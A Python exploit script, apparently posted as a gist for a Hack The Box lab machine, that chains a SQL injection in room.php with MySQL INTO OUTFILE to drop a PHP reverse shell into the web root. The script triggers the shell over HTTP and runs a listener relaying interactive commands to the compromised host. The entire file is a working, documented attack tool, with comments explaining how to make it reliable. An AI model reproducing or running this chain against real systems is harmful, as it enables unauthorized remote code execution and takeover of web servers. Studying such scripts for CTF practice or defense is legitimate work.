@vitorfhc
Created November 3, 2019 19:58
# This code was written by Vitor Falcão <vitorfhc at protonmail.com>
#!/usr/bin/python3
from binascii import hexlify
from random import choice
from secrets import choice as secure_choice
from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from string import ascii_lowercase, ascii_uppercase
from threading import Event, Thread

from requests import get, exceptions
# Local PHP reverse-shell template. file_to_hex() rewrites the literal
# placeholders "$ip='ip'" and "$port=1337" in it, so the template is expected
# to contain exactly those strings (a missing placeholder is silently left as is).
FILE: str = "reverse.min.php" # file with reverse php shell
# Target base URL; the injection point is room.php?cod= (see sqli()).
HOST: str = "http://10.10.10.143" # htb machine ip
# Callback address baked into the shell; get_info() lets the operator override it.
IP: str = "10.10.15.8" # reverse shell ip
# Callback port baked into the shell and bound locally by listen_conn().
PORT: int = 1337 # reverse shell port
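def random_string(length):
    """Return a random string of ASCII letters of the given length.

    The result becomes the name of the file dropped into the target's
    world-readable web root, so it is drawn from the ``secrets`` CSPRNG
    rather than ``random``: a hard-to-guess name is the only thing keeping
    other people on the network from stumbling onto the shell.

    Args:
        length: number of characters to produce; 0 yields "".

    Returns:
        A string of exactly ``length`` characters from [a-zA-Z].
    """
    alphabet = ascii_lowercase + ascii_uppercase
    return "".join(secure_choice(alphabet) for _ in range(length))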
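def file_to_hex(filename, ip=None, port=None):
    """Read a PHP shell template, patch in the callback address, return it as a MySQL hex literal.

    The literal placeholders ``$ip='ip'`` and ``$port=1337`` are replaced
    textually; if the template does not contain them the content is returned
    unchanged (no error is raised), so check the template when the shell never
    calls back. The ``0x...`` form is what sqli() splices into the injected
    query, which keeps quotes out of the injection string.

    Args:
        filename: path of the template file (read as UTF-8).
        ip: callback IP to embed; defaults to the module-level IP.
        port: callback port to embed; defaults to the module-level PORT.

    Returns:
        ``"0x"`` followed by the hex encoding of the patched file content.

    Raises:
        OSError: if the template cannot be read.
    """
    callback_ip = IP if ip is None else ip
    callback_port = PORT if port is None else port
    with open(filename, encoding="utf-8") as f:
        content = f.read()
    content = content.replace("$ip='ip'", f"$ip='{callback_ip}'")
    content = content.replace("$port=1337", f"$port={callback_port}")
    return "0x" + hexlify(content.encode()).decode()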
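def sqli(filename=None, webroot="/var/www/html"):
    """Drop the PHP reverse shell into the target's web root via SQL injection.

    The injected query (``1 or 1=2 limit 0,1``) keeps the result to a single
    row and uses MySQL's ``INTO OUTFILE ... LINES TERMINATED BY`` so that the
    hex-decoded shell source is appended to the written row. Nothing here
    checks the HTTP response or that the file was actually written; this
    presumably relies on the DB account having FILE privilege and on the web
    root being writable by the database server, neither of which is verified.

    Args:
        filename: shell template passed to file_to_hex(); defaults to FILE.
        webroot: directory on the target the file is written into.

    Returns:
        The random basename of the dropped file, relative to the web root.
    """
    template = FILE if filename is None else filename
    print("Making sql injection")
    random_name = random_string(8) + ".php"
    hex_payload = file_to_hex(template)
    payload = (
        f"1 or 1=2 limit 0,1 into outfile '{webroot}/{random_name}' "
        f"lines terminated by {hex_payload}"
    )
    # Send the injection as a proper query parameter so spaces, quotes and
    # commas are percent-encoded instead of relying on lenient URL requoting;
    # the timeout keeps a stalled server from hanging the whole run.
    get(HOST + "/room.php", params={"cod": payload}, timeout=10)
    print("Created file", random_name, "on the server")
    return random_name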
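def execute_reverse(path, timeout=3):
    """Trigger the dropped shell by requesting it over HTTP.

    A successful trigger is expected to produce no response: presumably the
    PHP process stays alive for as long as the reverse connection is open, so
    the request times out and the timeout is treated as success. Any other
    request error (refused connection, DNS failure, ...) propagates.

    Args:
        path: basename of the dropped file, relative to the web root.
        timeout: seconds to wait before assuming the shell has launched.
    """
    print("Executing reverse shell:", path)
    url = HOST + "/" + path
    try:
        get(url, timeout=timeout)
    except exceptions.Timeout:
        # Expected: the page blocks while the shell is running.
        pass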
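def listen_conn(port=None, bind_addr="0.0.0.0", ready=None):
    """Accept the shell's callback and relay an interactive session on it.

    Takes exactly one TCP connection, then loops: print what the peer sends,
    read a command from the operator, send it. Returns when the peer closes
    the connection or the operator sends EOF (Ctrl-D).

    Args:
        port: port to listen on; defaults to the module-level PORT.
        bind_addr: address to bind. The default "0.0.0.0" exposes the
            listener on every interface, so on a shared network anyone who
            connects first takes the one session this function accepts;
            pass the VPN/tun address to narrow that.
        ready: optional threading.Event that is set once the socket is
            listening, so a caller can delay triggering the callback until
            it can actually be accepted.
    """
    listen_port = PORT if port is None else port
    with socket(AF_INET, SOCK_STREAM) as srv:
        srv.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        srv.bind((bind_addr, listen_port))
        srv.listen()
        if ready is not None:
            ready.set()
        conn, addr = srv.accept()
        with conn:
            print("Got connection from", addr)
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    # recv() returning b"" means the peer hung up; without
                    # this check the loop would spin on a dead socket.
                    print("Connection closed by", addr)
                    break
                # Decode leniently so non-UTF-8 output never kills the session.
                print(chunk.decode(errors="replace"), end="", flush=True)
                try:
                    command = input("Send: ")
                except EOFError:
                    print()
                    break
                # input() strips the newline; a line-oriented remote shell
                # needs it back before it will execute the command.
                conn.sendall((command + "\n").encode())


def get_info():
    """Prompt for the callback IP, keeping the current IP when the input is empty.

    The value is stripped before it is stored: it is spliced verbatim into
    the PHP source by file_to_hex(), where stray whitespace would corrupt
    the address.
    """
    global IP
    entered = input(f"Your IP [{IP}]: ").strip()
    if entered:
        IP = entered


def main():
    """Run the chain: prompt for the IP, drop the shell, listen, trigger it."""
    get_info()
    path = sqli()
    # The listener must be bound before the shell is triggered, otherwise the
    # callback can arrive before accept() is ready and the session is lost;
    # Thread.start() alone does not guarantee that, hence the Event handshake.
    ready = Event()
    listener = Thread(target=listen_conn, kwargs={"ready": ready})
    listener.start()
    if not ready.wait(timeout=5):
        raise RuntimeError("listener did not start (bind/listen failed?)")
    execute_reverse(path)
    listener.join()


if __name__ == "__main__":
    main()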